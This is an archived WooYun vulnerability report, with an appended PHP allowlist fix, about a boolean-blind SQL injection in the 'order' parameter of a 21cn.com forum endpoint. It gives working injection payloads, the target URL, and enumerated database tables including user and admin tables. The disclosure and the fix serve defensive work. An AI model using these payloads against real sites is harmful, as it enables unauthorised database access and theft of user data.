Vulnerability summary

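Issue ID: wooyun-2015-0112923

Vulnerability title: SQL injection and phpinfo information disclosure on a 世纪龙 site

Vendor: 世纪龙信息网络有限责任公司

Reporter: 路人甲

Submitted: 2015-05-11 10:01

Fixed: 2015-06-25 11:10

Made public: 2015-06-25 11:10

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by the vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]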

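Vulnerability details

Disclosure status:

2015-05-11: Details reported to the vendor; awaiting vendor handling
2015-05-11: Vendor confirmed; details disclosed to the vendor only
2015-05-21: Details disclosed to core white hats and experts in related fields
2015-05-31: Details disclosed to regular white hats
2015-06-10: Details disclosed to intern white hats
2015-06-25: Details disclosed to the public

Brief description:

233

Detailed description: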

http://ts.21cn.com:80/home/morepost (POST)
order=1&pages=0
Parameter: order
payload
order=1%2c(select%20case%20when%20(3*2*1%3d6%20AND%20000776%3d000776)%20then%201%20else%201*(select%20table_name%20from%20information_schema.tables)end)%3d1

Proof of vulnerability:

Parameter: order (POST)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: order=(SELECT (CASE WHEN (1056=1056) THEN 1056 ELSE 1056*(SELECT 1056 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&pages=0
---
web application technology: Nginx
back-end DBMS: MySQL 5.0
Database: jutousu
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| iic_user | 73834 |
| iic_reply | 43953 |
| iic_digg | 41251 |
| iic_log | 32647 |
| iic_post_sync | 15150 |
| iic_user_addres | 14712 |
| iic_digg_20131224 | 13041 |
| iic_post | 12630 |
| iic_post_com | 8575 |
| iic_reply_sync | 6180 |
| iic_area | 3407 |
| iic_collective_digg | 1831 |
| iic_access | 917 |
| iic_com | 753 |
| iic_recom | 641 |
| iic_collective_reply | 591 |
| iic_case | 586 |
| iic_merchant | 350 |
| iic_node | 271 |
| iic_captcha | 226 |
| iic_ipadmin | 96 |
| iic_feedback | 93 |
| iic_movice | 87 |
| iic_redblackdigg | 73 |
| iic_collective | 70 |
| iic_postkeyword | 66 |
| iic_cat | 61 |
| iic_reply_link | 60 |
| iic_collectivetimeline | 59 |
| iic_hotpost | 42 |
| iic_role_account | 39 |
| iic_team | 37 |
| iic_collectivenews | 33 |
| iic_wxuser | 32 |
| iic_account | 30 |
| iic_specialcolumn | 27 |
| iic_collectiveslide | 26 |
| iic_proc | 24 |
| iic_redblacklist | 24 |
| iic_article | 13 |
| iic_collectiveweibo | 11 |
| iic_admin | 8 |
| iic_keyword | 7 |
| iic_role | 6 |
| iic_ip | 4 |
| iic_experttype | 3 |
| iic_post_dealwith_satisfaction | 3 |
| iic_arc | 2 |
| iic_wbsync | 2 |
| iic_filter | 1 |
+--------------------------------+---------+


phpinfo
Dangerous mode is also enabled...

[Screenshot: s20150508174033.png]

Fix:

~~

Copyright notice: please credit the source when reposting: 路人甲@乌云
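
A mitigation sketch for the `order` parameter, added here as an example; it is not part of the original report or the vendor's code. It assumes `order` selects a sort order for the listing (suggested by the parameter name and the comma-appended payload, not stated in the report); the function name, table and column names, and page size are hypothetical.

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist: the only `order` values the endpoint accepts, each
// tied to a fixed SQL fragment. Column names are assumptions, not from the report.
const SORT_OPTIONS = [
    '1' => 'created_at DESC',
    '2' => 'reply_count DESC',
];
const PAGE_SIZE = 20; // assumed page size

// Sort expressions cannot be bound as prepared-statement parameters, so the
// request value is used only as a lookup key and never reaches the SQL text.
function buildMorePostQuery(array $post): array
{
    $order = $post['order'] ?? '1';
    $pages = $post['pages'] ?? '0';

    // Rejects arrays (order[]=...) and anything that is not an exact key.
    if (!is_string($order) || !array_key_exists($order, SORT_OPTIONS)) {
        throw new InvalidArgumentException('unsupported order value');
    }
    // Digits only, bounded length, so the offset is always a small integer.
    if (!is_string($pages) || !ctype_digit($pages) || strlen($pages) > 6) {
        throw new InvalidArgumentException('pages must be a non-negative integer');
    }

    $sql = 'SELECT id, title FROM posts ORDER BY ' . SORT_OPTIONS[$order]
         . ' LIMIT :limit OFFSET :offset';
    // With PDO, bind both values using PDO::PARAM_INT.
    return [$sql, [':limit' => PAGE_SIZE, ':offset' => (int)$pages * PAGE_SIZE]];
}

// Constructed sample requests: the normal form from the report, and a value
// with an appended expression in the same shape as the reported payload.
foreach ([
    ['order' => '1', 'pages' => '0'],
    ['order' => '1,(select 1)=1', 'pages' => '0'],
] as $post) {
    try {
        [$sql, $params] = buildMorePostQuery($post);
        echo "accepted: $sql\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ' . $e->getMessage() . "\n";
    }
}
```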


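Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-05-11 11:09

Vendor reply:

Thank you for your attention to the security of our services. Based on your report, we have begun handling the issue. Thank you.

Latest status:

None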